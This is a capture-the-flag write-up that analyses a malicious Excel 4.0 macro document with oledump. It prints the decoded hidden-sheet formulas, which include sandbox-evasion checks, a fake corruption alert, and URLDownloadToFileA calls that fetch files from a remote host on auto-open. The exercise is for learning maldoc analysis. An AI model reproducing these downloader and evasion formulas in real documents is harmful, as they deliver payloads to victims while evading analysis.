jebidiah-anthony
write-ups and what not
Reality Challenge
PART 1 : GIVEN FILES
$ md5sum reality.tar.gz
4f494a43e54d1ba0936e58a299f25fc0 reality.tar.gz
$ sha1sum reality.tar.gz
f74ea01066dc1b1bd25a900def3d7bd1b410f9be reality.tar.gz
$ gzip -d reality.tar.gz
$ tar xvf reality.tar.gz
reality/
reality/readme.txt
reality/topsecret.xls
PART 2 : CHALLENGE DESCRIPTION
The file, readme.txt, reads the following:
Challenge Description: You must obtain the hidden secrets in order to see the reality.
PART 3 : THE MALDOC
Opening topsecret.xls reveals nothing much:
Microsoft Excel is capable of using OLE (Object Linking and Embedding), which allows you to take objects in a document and place them in other applications, or perhaps even in the document itself.
I decided to check if the Excel file is using Object Linking and Embedding using oledump.py:
$ python oledump.py -p plugin_biff --pluginoptions "-x" "../topsecret.xls"
---omitted---
0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible
0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, very hidden
0018 23 LABEL : Cell Value, String Constant - build-in-name 1 Auto_Open
0006 598 FORMULA : Cell Formula - R50C18 len=576 ptgRefV R500C49154 ptgRefV R501C49154 ptgConcat ---omitted--- ptgRefV R593C49154 ptgConcat ptgAttr ptgRef R50C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
0006 276 FORMULA : Cell Formula - R51C18 len=254 ptgRefV R500C49156 ptgRefV R501C49156 ptgConcat ---omitted--- ptgRefV R540C49156 ptgConcat ptgRef R51C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
0006 276 FORMULA : Cell Formula - R52C18 len=254 ptgRefV R500C49158 ptgRefV R501C49158 ptgConcat ---omitted--- ptgRefV R540C49158 ptgConcat ptgRef R52C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
0006 246 FORMULA : Cell Formula - R53C18 len=224 ptgRefV R500C49160 ptgRefV R501C49160 ptgConcat ---omitted--- ptgRefV R535C49160 ptgConcat ptgRef R53C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
0006 246 FORMULA : Cell Formula - R54C18 len=224 ptgRefV R500C49162 ptgRefV R501C49162 ptgConcat ---omitted--- ptgRefV R535C49162 ptgConcat ptgRef R54C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
0006 414 FORMULA : Cell Formula - R55C18 len=392 ptgRefV R500C49164 ptgRefV R501C49164 ptgConcat ---omitted--- ptgRefV R563C49164 ptgConcat ptgRef R55C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
0006 888 FORMULA : Cell Formula - R56C18 len=866 ptgRefV R500C49167 ptgRefV R501C49167 ptgConcat ---omitted--- ptgRefV R642C49167 ptgConcat ptgRef R56C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
0006 108 FORMULA : Cell Formula - R57C18 len=86 ptgRefV R500C49169 ptgRefV R501C49169 ptgConcat ---omitted--- ptgRefV R512C49169 ptgConcat ptgRef R57C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
0006 37 FORMULA : Cell Formula - R58C18 len=15 ptgStr "calc.exe" ptgFuncVarV args 1 func EXEC (0x006e)
0006 37 FORMULA : Cell Formula - R59C18 len=15 ptgStr "Sheet2" ptgBool TRUE ptgFuncVarV args 2 func WORKBOOK.HIDE (0x817f)
---omitted---
There is a sheet hidden using WORKBOOK.HIDE:
It contains the following Excel functions, written vertically, with each character placed to the right of its ASCII decimal value:
=ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
=IF(GET.WORKSPACE(13)<770, CLOSE(FALSE),)
=IF(GET.WORKSPACE(14)<381, CLOSE(FALSE),)
=IF(GET.WORKSPACE(19),,CLOSE(FALSE))
=IF(GET.WORKSPACE(42),,CLOSE(FALSE))
=IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(FALSE))
=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://easteregg.rootcon.net/AZfzv7ckfbxj2Q6X/GC3Z543PZQL2buV ","c:\Users\Public\flag.txt",0,0)
=CLOSE(FALSE)
PART 4 : GETTING THE FLAG
The CALL function highlighted earlier seems to download a file and save it to c:\Users\Public\flag.txt. Attempting to download the same file gives you:
The flag is somewhere else…
Going back to the OLE dump:
$ python oledump.py -p plugin_biff --pluginoptions "-x" "../topsecret.xls"
---omitted---
0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible
0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, very hidden
0018 23 LABEL : Cell Value, String Constant - build-in-name 1 Auto_Open
0006 598 FORMULA : Cell Formula - R50C18 len=576 ptgRefV R500C49154 ptgRefV R501C49154 ptgConcat ---omitted--- ptgRefV R593C49154 ptgConcat ptgAttr ptgRef R50C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
0006 276 FORMULA : Cell Formula - R51C18 len=254 ptgRefV R500C49156 ptgRefV R501C49156 ptgConcat ---omitted--- ptgRefV R540C49156 ptgConcat ptgRef R51C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
0006 276 FORMULA : Cell Formula - R52C18 len=254 ptgRefV R500C49158 ptgRefV R501C49158 ptgConcat ---omitted--- ptgRefV R540C49158 ptgConcat ptgRef R52C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
0006 246 FORMULA : Cell Formula - R53C18 len=224 ptgRefV R500C49160 ptgRefV R501C49160 ptgConcat ---omitted--- ptgRefV R535C49160 ptgConcat ptgRef R53C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
0006 246 FORMULA : Cell Formula - R54C18 len=224 ptgRefV R500C49162 ptgRefV R501C49162 ptgConcat ---omitted--- ptgRefV R535C49162 ptgConcat ptgRef R54C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
0006 414 FORMULA : Cell Formula - R55C18 len=392 ptgRefV R500C49164 ptgRefV R501C49164 ptgConcat ---omitted--- ptgRefV R563C49164 ptgConcat ptgRef R55C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
0006 888 FORMULA : Cell Formula - R56C18 len=866 ptgRefV R500C49167 ptgRefV R501C49167 ptgConcat ---omitted--- ptgRefV R642C49167 ptgConcat ptgRef R56C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
0006 108 FORMULA : Cell Formula - R57C18 len=86 ptgRefV R500C49169 ptgRefV R501C49169 ptgConcat ---omitted--- ptgRefV R512C49169 ptgConcat ptgRef R57C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
0006 37 FORMULA : Cell Formula - R58C18 len=15 ptgStr "calc.exe" ptgFuncVarV args 1 func EXEC (0x006e)
0006 37 FORMULA : Cell Formula - R59C18 len=15 ptgStr "Sheet2" ptgBool TRUE ptgFuncVarV args 2 func WORKBOOK.HIDE (0x817f)
---omitted---
It seems that the eight formulas written vertically from earlier are being referenced in ROWS 50-57 in COL 49171 and the characters starting from ROW 500 downward are being concatenated using ptgConcat to build the entire function/formula.
Now, if you consider COL 49154 to be column B in Sheet 2, then COL 49156 should be column D, COL 49158 should be column F, and so on…
The expected columns where the function/formulas are built should be B → D → F → H → J → L → N → P but as you can see from the dump, COL 49164 jumps to COL 49167 meaning column L jumped to column O which shouldn’t be the case.
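The gap check described above can be automated. This is an added example, not part of the original write-up or of oledump: it parses FORMULA records in the plugin_biff format shown (sample lines abbreviated from the dump) and reports any source column the sequence predicts but no formula reads. It assumes, as the text does, that COL 49154 is column B and that source columns step by two.

```python
import re

BASE_COL = 49154   # assumption taken from the write-up: COL 49154 is column B
STRIDE = 2         # assumption: each formula reads every second column
CELL = re.compile(r"Cell Formula - (R\d+C\d+)")
REF = re.compile(r"ptgRefV R(\d+)C(\d+)")

# Constructed sample: records abbreviated from the plugin_biff dump above.
DUMP = """\
0006 598 FORMULA : Cell Formula - R50C18 len=576 ptgRefV R500C49154 ptgRefV R501C49154 ptgConcat ---omitted--- ptgRefV R593C49154 ptgConcat ptgAttr ptgRef R50C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
0006 276 FORMULA : Cell Formula - R51C18 len=254 ptgRefV R500C49156 ptgConcat ---omitted--- ptgRefV R540C49156 ptgConcat ptgRef R51C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
0006 276 FORMULA : Cell Formula - R52C18 len=254 ptgRefV R500C49158 ptgConcat ---omitted--- ptgRefV R540C49158 ptgConcat ptgRef R52C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
0006 246 FORMULA : Cell Formula - R53C18 len=224 ptgRefV R500C49160 ptgConcat ---omitted--- ptgRefV R535C49160 ptgConcat ptgRef R53C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
0006 246 FORMULA : Cell Formula - R54C18 len=224 ptgRefV R500C49162 ptgConcat ---omitted--- ptgRefV R535C49162 ptgConcat ptgRef R54C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
0006 414 FORMULA : Cell Formula - R55C18 len=392 ptgRefV R500C49164 ptgConcat ---omitted--- ptgRefV R563C49164 ptgConcat ptgRef R55C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
0006 888 FORMULA : Cell Formula - R56C18 len=866 ptgRefV R500C49167 ptgConcat ---omitted--- ptgRefV R642C49167 ptgConcat ptgRef R56C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
0006 108 FORMULA : Cell Formula - R57C18 len=86 ptgRefV R500C49169 ptgConcat ---omitted--- ptgRefV R512C49169 ptgConcat ptgRef R57C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
0006 37 FORMULA : Cell Formula - R58C18 len=15 ptgStr "calc.exe" ptgFuncVarV args 1 func EXEC (0x006e)
"""

def col_letter(col):
    """Map an oledump column number to a sheet letter (A-Z only)."""
    return chr(ord("A") + 1 + (col - BASE_COL))

def source_columns(dump):
    """Return (formula_cell, source_col, first_row, last_row) per concat chain."""
    records = []
    for line in dump.splitlines():
        cell = CELL.search(line)
        refs = [(int(r), int(c)) for r, c in REF.findall(line)]
        cols = {c for _, c in refs}
        if not cell or len(cols) != 1:
            continue  # skip records that do not read from exactly one column
        rows = [r for r, _ in refs]
        records.append((cell.group(1), cols.pop(), min(rows), max(rows)))
    return records

def skipped_columns(records):
    """Letters of columns the stride predicts but no formula reads from."""
    cols = [rec[1] for rec in records]
    return [col_letter(prev + STRIDE)
            for prev, cur in zip(cols, cols[1:]) if cur - prev != STRIDE]

if __name__ == "__main__":
    for cell, col, first, last in source_columns(DUMP):
        print(f"{cell} <- column {col_letter(col)} rows {first}-{last}")
    print("skipped:", skipped_columns(source_columns(DUMP)))
```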
If you look at the Excel Sheet, it would show that column N is missing and when revealed:
It shows a new set of numbers which when converted to ASCII:
=CALL("urlmon","URLDownloaToFileA","JJCCJJ",0,"http://easteregg.rootcon.net/sFpWgx9WkHQQ542K/36xQCWUDNaJpbTB","c:\Users\Public\flag.txt",0,0)
A new download link is found, whose file is also saved to c:\Users\Public\flag.txt:
$ cat 36xQCWUDNaJpbTB
rc_easter{r34l1ty_15_0ft3n__d1s4pp01nt1ng}
The real flag is revealed after downloading the file!!